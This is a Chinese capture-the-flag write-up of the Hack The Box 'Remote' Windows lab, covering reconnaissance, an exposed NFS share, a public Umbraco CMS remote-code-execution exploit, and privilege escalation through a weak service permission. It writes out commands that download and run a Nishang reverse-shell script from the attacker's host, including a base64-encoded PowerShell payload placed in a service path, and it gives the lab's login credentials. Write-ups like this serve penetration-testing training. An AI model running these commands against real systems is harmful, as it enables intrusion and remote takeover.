原创 | 记一次对Hack the box_remote的渗透测试

admin 2023年5月18日01:01:41评论83 views字数 2110阅读7分2秒阅读模式

点击蓝字




关注我们



简介


这是一个简单的Windows Server 2019靶机,要成功获得SYSTEM权限需要不懈的尝试。通过浏览Web站点发现Umbraco CMS登录入口,然后在2049端口发现NFS服务并发现共享文件夹,在共享文件夹中发现了Umbraco CMS的版本信息、用户名和密码,然后可以登录CMS系统,利用已知的远程代码执行漏洞反弹Shell,通过枚举运行的服务发现不安全的服务权限,最后通过修改服务调用的程序获得SYSTEM权限。


信息收集


1.端口扫描

首先使用nmap进行端口扫描。发现开启了135,5985、139、80端口。

原创 | 记一次对Hack the box_remote的渗透测试

利用nmap进行深度扫描,发现FTP,SMB,HTTP和NFS服务正在运行。

原创 | 记一次对Hack the box_remote的渗透测试

查看web页面。

原创 | 记一次对Hack the box_remote的渗透测试

2.发现CMS类型

发现都存在umbraco这个词。在页面底端也发现了这个词。

原创 | 记一次对Hack the box_remote的渗透测试

原创 | 记一次对Hack the box_remote的渗透测试

3.搜索引擎

通过搜索引擎搜索,发现其为一个cms。

原创 | 记一次对Hack the box_remote的渗透测试

4.目录扫描

通过目录扫描,发现存在/umbraco这个目录。

原创 | 记一次对Hack the box_remote的渗透测试

原创 | 记一次对Hack the box_remote的渗透测试

之前使用nmap深度扫描,发现其存在NFS服务。

原创 | 记一次对Hack the box_remote的渗透测试

5.NFS共享文件夹搭建到本地环境

然后使用showmount查看目标主机NFS共享的文件夹,发现存在可访问的

/site_backups文件夹,然后将其挂载到本地。

原创 | 记一次对Hack the box_remote的渗透测试

原创 | 记一次对Hack the box_remote的渗透测试

查看site_backups文件夹中的信息,

原创 | 记一次对Hack the box_remote的渗透测试

6.查找敏感信息

在APP_Data目录下发现了sdf数据库文件信息,然后利用strings枚举该文件。

原创 | 记一次对Hack the box_remote的渗透测试

发现存在经过SHA1和HMACSHA256算法生成的hash值。然后使用hashcat进行解密。

原创 | 记一次对Hack the box_remote的渗透测试

使用find命令,搜索到了用户的邮箱。

原创 | 记一次对Hack the box_remote的渗透测试

使用邮箱账户和解密出来的密码进行登录。发现其是7.12.4版本。

原创 | 记一次对Hack the box_remote的渗透测试


漏洞利用


1、然后就使用searchsplit搜索可用的EXP。

原创 | 记一次对Hack the box_remote的渗透测试

2、然后对其进行修改。

添加邮箱和密码。

原创 | 记一次对Hack the box_remote的渗透测试

使用nishang进行反弹shell,在文件最底下加上Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.3 -Port 4444.

原创 | 记一次对Hack the box_remote的渗透测试

3、然后执行命令。

python3 exploit.py -u [email protected] -p baconandcheese
-i http://10.10.10.180 -c powershell.exe -a "iex(new-object
net.webclient).downloadstring(http://10.10.16.3/Invoke-PowerShellTcp.ps1)"

原创 | 记一次对Hack the box_remote的渗透测试

4、在nishang文件下,开启http服务。

原创 | 记一次对Hack the box_remote的渗透测试

5、使用nc监听4444端口,成功反弹shell。

原创 | 记一次对Hack the box_remote的渗透测试

然后进入Users目录下。

原创 | 记一次对Hack the box_remote的渗透测试

6、发现存在public目录,使用dir查看存在user.txt。

成功找到第一个flag。

原创 | 记一次对Hack the box_remote的渗透测试


权限提升


1.使用systeminfo查看主机信息。

原创 | 记一次对Hack the box_remote的渗透测试

原创 | 记一次对Hack the box_remote的渗透测试

2.查看用户权限

使用whoami/priv 查看当前用户权限。

原创 | 记一次对Hack the box_remote的渗透测试

3.使用sc命令枚举存在缺陷的服务

发现UsoSvc服务可以被当前用户控制。

原创 | 记一次对Hack the box_remote的渗透测试

4. 生成POC,

使用

echo"IEX( IWR http://10.10.16.3/Invoke-PowerShellTcp.ps1-UseBasicParsing)" | iconv -t utf-16le|base64 -w 0,来生成poc。

原创 | 记一次对Hack the box_remote的渗透测试

5.监听端口反弹shell

使用sc.exe config
UsoSvc binpath= "cmd.exe /c powershell.exe -EncodedCommand
SQBFAFgAKAAgAEkAVwBSACAAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADYALgAzAC8ASQBuAHYAbwBrAGUALQBQAG8AdwBlAHIAUwBoAGUAbABsAFQAYwBwAC4AcABzADEAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACkACgA="。来弹shell。
原创 | 记一次对Hack the box_remote的渗透测试

继续使用nc监听4444端口。成功反弹shell。

原创 | 记一次对Hack the box_remote的渗透测试

6.寻找flag,结束靶机。

到了最后就是找flag的环节,先进入user目录下,找到了Administrator目录。接着进入Desktop,查看root.txt。成功找到最后一个靶标。

原创 | 记一次对Hack the box_remote的渗透测试


总结


接着就做一个总结:首先利用nmap进行扫描端口,然后对其进行深度扫描。发现其开启了NFS服务,然后就共享文件夹挂载到本地。在访问主页,发现是国外的cms。然后使用gobuster爆破后台地址。使用共享文件夹中的邮箱用户和hashcat枚举出的密码,进行登录。


接着发现cms版本信息。使用searchsploit搜索exp,发现存在一个可用的exp。修改exp,然后利用它得到一个低权限的shell。接下来发现sc命令存在缺陷,利用sc成功进行提权。靶机的大致过程就是这些了。还有一些别的提权思路,有机会在尝试一下别的思路。



往期推荐



原创 | CodeQL与AST之间联系

原创 | Filter内存马及工具检测

原创 | XXE利用:结合Local DTD和Error-Based技巧bypass防火墙


原文始发于微信公众号(SecIN技术平台):原创 | 记一次对Hack the box_remote的渗透测试

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月18日01:01:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   原创 | 记一次对Hack the box_remote的渗透测试https://cn-sec.com/archives/1740997.html

发表评论

匿名网友 填写信息